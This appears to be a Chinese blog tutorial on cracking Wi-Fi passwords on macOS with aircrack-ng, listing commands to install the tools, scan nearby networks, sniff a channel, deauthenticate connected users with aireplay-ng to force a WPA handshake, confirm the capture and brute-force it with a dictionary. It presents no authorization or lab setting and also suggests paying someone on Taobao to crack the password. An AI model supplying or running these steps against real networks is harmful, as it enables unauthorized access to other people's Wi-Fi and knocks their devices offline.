mac的无线破解，其实核心还是aircrack-ng，本文的作用就是介绍下mac下aircrack-ng安装和简单使用。

首先，我们需要在mac下安装xcode和MacPorts,默认xcode貌似装了，所以这里介绍下安装MacPorts。当前我用的mac是10.11。

为了快速安装，采取使用pkg文件安装（如果版本不一样，请看最下面关联链接）。

wget https://github.com/macports/macports-base/releases/download/v2.4.2/MacPorts-2.4.2-10.11-ElCapitan.pkg


使用port里面安装aircrack-ng速度最快，直接安装
sudo port install aircrack-ng -y

默认安装完毕，使用ifconfig获取当前网卡名字
ifconfig

使用airport获取信号（RSSI为信号强度，channel 为信号栏）
sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s

发现RSSI最好的是603603，他的信号栏是1，所以我们开始监听
sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport en0 sniff 1
通过
这里需要明白一点，在监听的时间内，有设备进行连接该wifi，才能抓取到密码。这里有两种思路，第一种是使用aireplay-ng踢掉在线用户，使其重新连接，新开一个窗口，命令格式如下
aireplay-ng --deaut 10 -a 路由器mac -c 本机mac en0,
命令如下：
aireplay-ng --deaut 10 -a 1c:60:de:8a:55:e2 -c ac:bc32:9b:94:09 en0
第二种则是等待一天时间，抓取大量报文。

大概预测抓到以后，使用ctrl+c，自动保存到tmp目录下。

查看是否抓到数据
sudo aircrack-ng   /tmp/airportSniff8g0Oex.cap | grep handshake | head -n 20

采取字典进行爆破，其实还是靠字典的能力了，也可以到淘宝花钱找人爆破密码。

https://www.cnblogs.com/diligenceday/p/6344487.html